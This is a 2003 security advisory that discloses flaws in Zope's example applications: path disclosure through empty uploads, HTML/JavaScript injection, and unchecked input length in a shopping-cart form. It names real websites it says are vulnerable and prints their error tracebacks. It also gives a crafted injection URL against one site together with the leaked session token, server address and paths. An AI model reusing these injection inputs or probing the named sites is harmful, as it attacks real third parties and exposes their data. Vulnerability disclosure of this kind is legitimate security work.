------------------------------------------------------------------ - EXPL-A-2003-009 exploitlabs.com Advisory 009 ------------------------------------------------------------------ -=- The DoPe on zOpE -=- Donnie Werner June 19, 2003 exploitlabs.com Product: -------- Zope -=- open source application server http://www.zope.com/ Vunerability(s): ================ 1 - Empty Upload ( physical location dump ) -=- /Examples/FileLibrary/addFile 2 - Html / js injection -=- /Examples/db/ 3 - Blank Query -=- /Examples/ShoppingCart 3a - iframe Query ( Html/js injection ) -=- /Examples/ShoppingCart/addItems 3b - Unchecked Input Lenght -=- /Examples/ShoppingCart/addItems 3c - Unchecked Characters -=- /Examples/ShoppingCart/addItems Remote: ------- yup not vurlnerable to #1 ( blank upload ) ----------------------------------- examples.. http://www.aixtraware.de/TCPware/Examples Server: Zope/(Zope 2.6.1 (binary release, python 2.1, linux2-x86), python 2.1.3, linux2) ZServer/1.1b1 http://ispg.csu.edu.au Server: Zope/(Zope 2.5.1 (source release, python 2.1, linux2), python 2.1.3, freebsd4) ZServer/1.1b1 http://www.jungle2.org Server: Zope/(Zope 2.5.1 (OpenBSD package zope-2.5.1p1), python 2.1.3, openbsd3) ZServer/1.1b1 vurlnerable ----------- Example URLS - #1: http://klever.multimedia.fh-augsburg.de Server: Zope/(Zope 2.6.1 (source release, python 2.1, linux2), python 2.1.3, linux2) ZServer/1.1b1 http://grlug.org/ Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12 mod_ssl/2.8.12 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.1.2 mod_perl/1.26 http://grlug.org/zope/Examples/FileLibrary/addFile Error... Zope has encountered an error while publishing this resource. Error Type: Bad Request Error Value: Empty or invalid id specified. Troubleshooting Suggestions The URL may be incorrect. The parameters passed to this resource may be incorrect. A resource that this resource relies on may be encountering an error. For more detailed information about the error, please refer to the HTML source for this page. If the error persists please contact the site maintainer. Thank you for your patience. Traceback (innermost last): File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 150, in publish_module File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 114, in publish File /usr/local/src/zope/lib/python/Zope/__init__.py, line 159, in zpublisher_exception_hook (Object: FileLibrary) File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 98, in publish File /usr/local/src/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply (Object: addFile) File /usr/local/src/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object (Object: addFile) File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__ (Object: addFile) File /usr/local/src/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec (Object: addFile) File /usr/local/src/zope/lib/python/Products/PythonScripts/PythonScript.py, line 302, in _exec (Object: addFile) (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, (,), {}, None)) File Script (Python), line 7, in addFile File /usr/local/src/zope/lib/python/OFS/Image.py, line 52, in manage_addFile (Object: Files) File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 236, in _setObject (Object: Files) File /usr/local/src/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId (Object: Files) Bad Request: (see above) Example-1.2: http://www.pitch.com Server: Apache/1.3.27 (Unix) (Red-Hat/Linux) mod_fastcgi/2.2.12 /Examples/FileLibrary/addFile Site Error An error was encountered while publishing this resource. Error Type: Bad Request Error Value: Empty or invalid id specified. Traceback Traceback (innermost last): File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 98, in publish File /usr/local/zope/lib/python/ZPublisher/mapply.py, line 88, in mapply (Object: addFile) File /usr/local/zope/lib/python/ZPublisher/Publish.py, line 39, in call_object (Object: addFile) File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 252, in __call__ (Object: addFile) File /usr/local/zope/lib/python/Shared/DC/Scripts/Bindings.py, line 283, in _bindAndExec (Object: addFile) File /usr/local/zope/lib/python/Products/PythonScripts/PythonScript.py, line 291, in _exec (Object: addFile) (Info: ({'script': , 'context': , 'container': , 'traverse_subpath': []}, (,), {}, None)) File Script (Python), line 7, in addFile File /usr/local/zope/lib/python/OFS/Image.py, line 52, in manage_addFile (Object: Files) File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 219, in _setObject (Object: Files) File /usr/local/zope/lib/python/OFS/ObjectManager.py, line 53, in checkValidId (Object: Files) Bad Request: Empty or invalid id specified. ================================================================================================ ================================================================================================ Example-2.1: http://www.c-media.com.au/Examples/db/ExampledbBrowseReport http://198.78.66.174:8080/Examples/ exploit: -------- edit the "discription" field for html / js injection http://ebay.com/ Example 3b - 3c: ---------------- Sending any string longer that 11 characters in the quanity field causes a dump. details here... http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems?orders.id%3Arecords=510-007&orders.quantity%3Arecords=123456789101112131415&orders.id%3Arecords=510-122&orders.quantity%3Arecords=+%3Ctd%3ENeed+to+go+out+of+town+for+a+few+days%2C+and+no+one+can+feed+your+pigeons%3F+Don%27t+worry%2C+we+now+have+the+virtually+spillproof+hopper+feeder.+Made+from+birch+plywood+it+holds+from+30+to+35+pounds+of+grain.+Pigeons+can+get+at+the+feed+through+holes+in+the+plexiglass+cover%2C+but+will+not+be+able+to+kick+out+any+feed.%3C%2Ftd%3E&orders.id%3Arecords=510-115&orders.quantity%3Arecords=0 reveal these items.. SESSION id: 10546821410043251757, token: 40684361A01gE7Hjjvc, contents: [] SERVER_URL 'http://www.sfweekly.com' VirtualRootPhysicalPath ('', 'san') PUBLISHED URL 'http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems' AUTHENTICATED_USER Anonymous User TraversalRequestNameStack [] AUTHENTICATION_PATH 'san/virtual_hosts' URL0 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems URL1 http://www.sfweekly.com/calendar/Examples/ShoppingCart URL2 http://www.sfweekly.com/calendar/Examples URL3 http://www.sfweekly.com/calendar URL4 http://www.sfweekly.com BASE0 http://www.sfweekly.com BASE1 http://www.sfweekly.com BASE2 http://www.sfweekly.com/calendar BASE3 http://www.sfweekly.com/calendar/Examples BASE4 http://www.sfweekly.com/calendar/Examples/ShoppingCart BASE5 http://www.sfweekly.com/calendar/Examples/ShoppingCart/addItems environ DOCUMENT_ROOT '/home/nti/htdocs/san' SERVER_ADDR '63.241.135.221' HTTP_ACCEPT_ENCODING 'gzip, deflate' SCRIPT_FILENAME '/home/httpd/fastcgi/slave2' GATEWAY_INTERFACE 'CGI/1.1' SERVER_PORT '80' PATH_TRANSLATED '/home/httpd/fastcgi/slave3/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/VirtualHostBase/http/www.sfweekly.com:80/san/VirtualHostRoot/calendar/Examples/ShoppingCart/addItems' source 'slave2' UNIQUE_ID 'Pt02bz-xh80AAC79HHU' =================================================================== extra notes =================================================================== Update of /cvs-repository/Releases/Zope/lib/python/Products/PythonScripts In directory cvs.zope.org:/tmp/cvs-serv29374/Products/PythonScripts Modified Files: Utility.py module_access_examples.py Log Message: Merge evan-modsec_fix-branch === Releases/Zope/lib/python/Products/PythonScripts/Utility.py 1.4 => 1.5 === __version__='$Revision$'[11:-2] -from AccessControl import ModuleSecurityInfo, ClassSecurityInfo -from Globals import InitializeClass -import string - -def allow_module(module_name): - """Allow a module and all its contents to be used from a - restricted Script. The argument module_name may be a simple - or dotted module or package name. Note that if a package - path is given, all modules in the path will be available.""" - ModuleSecurityInfo(module_name).setDefaultAccess(1) - dot = string.find(module_name, '.') - while dot > 0: - ModuleSecurityInfo(module_name[:dot]).setDefaultAccess(1) - dot = string.find(module_name, '.', dot + 1) - -def allow_class(Class): - """Allow a class and all of its methods to be used from a - restricted Script. The argument Class must be a class.""" - Class._security = sec = ClassSecurityInfo() - sec.declareObjectPublic() - sec.setDefaultAccess(1) - sec.apply(Class) - InitializeClass(Class) +# These have been relocated, and should be imported from AccessControl +from AccessControl import allow_module, allow_class === Releases/Zope/lib/python/Products/PythonScripts/module_access_examples.py 1.1 => 1.2 === ''' -from Products.PythonScripts.Utility import allow_module, allow_class +from AccessControl import allow_module, allow_class, allow_type from AccessControl import ModuleSecurityInfo, ClassSecurityInfo from Globals import InitializeClass @@ -42,9 +42,9 @@ # ModuleSecurityInfo('re').declarePublic('compile', 'findall', # 'match', 'search', 'split', 'sub', 'subn', 'error', # 'I', 'L', 'M', 'S', 'X') -# from re import RegexObject, MatchObject -# allow_class(RegexObject) -# allow_class(MatchObject) +# import re +# allow_type(type(re.compile(''))) +# allow_type(type(re.match('x','x'))) # ModuleSecurityInfo('StringIO').declarePublic('StringIO' Vendor Fix: ----------- No fix on 0day Vendor Contact: --------------- info@zope.com - Concurrent with this advisory Credits: -------- Donnie Werner http://exploitlabs.com "were finding your holes" morning_wood@frame4.com - get tested ------------------------------------------------------------------------- be a good vendor... test your products first, it is your problem, fix it. http://nothackers.org - it's t0day -------------------------------------------------------------------------